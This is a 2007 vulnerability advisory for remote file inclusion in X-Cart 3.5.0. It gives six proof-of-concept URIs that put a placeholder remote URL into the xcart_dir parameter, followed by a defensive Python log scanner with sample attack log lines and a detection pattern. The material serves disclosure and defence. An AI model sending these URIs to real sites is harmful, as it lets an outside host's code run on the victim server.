

Title: Qualiteam X-Cart xcart_dir Multiple Remote File Include Vulnerabilities
Published: 2007-09-11 12:00 AM
Updated: 2007-09-12 07:31 PM
Class: Input Validation Error
CVE:
Remote: Yes
Local: No
Credit: aLiiF is credited with the discovery of these vulnerabilities.
Vulnerable: Qualiteam X-Cart 3.5.0
Not Vulnerable: Qualiteam X-Cart 4.1.8
Code: An attacker can exploit these issues via a browser. The following proof-of-concept URIs are available:

http://www.example.com/[xcart-path]/config.php?xcart_dir=http://www.example2.com/[inject]?
http://www.example.com/[xcart-path]/prepare.php?xcart_dir=http://www.example2.com/[inject]?
http://www.example.com/[xcart-path]/smarty.php?xcart_dir=http://www.example2.com/[inject]?
http://www.example.com/[xcart-path]/customer/product.php?xcart_dir=http://www.example2.com/[inject]?
http://www.example.com/[xcart-path]/provider/auth.php?xcart_dir=http://www.example2.com/[inject]?
http://www.example.com/[xcart-path]/admin/auth.php?xcart_dir=http://www.example2.com/[inject]?
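Every proof-of-concept URI above passes a remote URL in the xcart_dir query parameter, and that is the signature a defender can look for in web server access logs. The following Python script is an added example, not part of the advisory and not X-Cart code: it parses Apache combined-format log lines (constructed samples embedded below), extracts xcart_dir from each query string, percent-decodes the value repeatedly so double-encoded payloads are normalised, and reports any value that begins with a URL scheme or a protocol-relative `//`. The function names, the sample addresses, and the assumption that a legitimate request never carries a remote URL in xcart_dir are the example's own.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed Apache combined-format access-log lines (not real traffic):
# three remote-include attempts against xcart_dir (plain, percent-encoded,
# double-percent-encoded) and one benign request that never sends the parameter.
SAMPLE_LOG = """\
203.0.113.5 - - [11/Sep/2007:10:01:02 +0000] "GET /xcart/config.php?xcart_dir=http://www.example2.com/inject.txt? HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.5 - - [11/Sep/2007:10:01:05 +0000] "GET /xcart/admin/auth.php?xcart_dir=http%3A%2F%2Fwww.example2.com%2Finject.txt%3F HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.5 - - [11/Sep/2007:10:01:09 +0000] "GET /xcart/smarty.php?xcart_dir=http%253A%252F%252Fwww.example2.com%252Finject.txt%253F HTTP/1.1" 200 512 "-" "Mozilla/5.0"
198.51.100.7 - - [11/Sep/2007:10:02:10 +0000] "GET /xcart/customer/product.php?productid=42 HTTP/1.1" 200 8192 "-" "Mozilla/5.0"
"""

# Fields of the combined log format we need: client IP, timestamp, method, target, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# A value starting with a URL scheme (http:, https:, ftp:, php:, data:, ...) or a
# protocol-relative "//host" is what turns an include-path prefix into a remote fetch.
REMOTE_RE = re.compile(r'^(?:[a-z][a-z0-9+.-]*:|//)', re.IGNORECASE)

# The parameter named in the advisory; assumed here to be the only one of interest.
WATCHED_PARAMS = ("xcart_dir",)


def decode_fully(value, rounds=3):
    """Percent-decode repeatedly (bounded) so double-encoded payloads are normalised."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def find_rfi_attempts(log_text):
    """Return one finding per request that passes a remote URL in a watched parameter."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not requests in the expected format
        parts = urlsplit(m.group("target"))
        query = parse_qs(parts.query, keep_blank_values=True)  # decodes once
        for name in WATCHED_PARAMS:
            for raw in query.get(name, []):
                value = decode_fully(raw)
                if REMOTE_RE.match(value):
                    findings.append({
                        "ip": m.group("ip"),
                        "timestamp": m.group("ts"),
                        "script": parts.path,
                        "param": name,
                        "value": value,
                        "status": int(m.group("status")),
                    })
    return findings


if __name__ == "__main__":
    for f in find_rfi_attempts(SAMPLE_LOG):
        print(f"{f['ip']} {f['script']} {f['param']}={f['value']} (HTTP {f['status']})")
```

Extend WATCHED_PARAMS with any other parameter an application uses as an include-path prefix. A 200 status in a finding shows only that the request was served, not that the include succeeded; confirming that needs the PHP error log or outbound-connection records. The fix for this class of bug is for the application never to derive an include path from request input; on the server side, PHP's allow_url_include directive disabled removes the remote half of the problem for every script at once.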

Copyright 2007, SecurityDot
Thu, 17 Dec 2009 14:22:25 +0000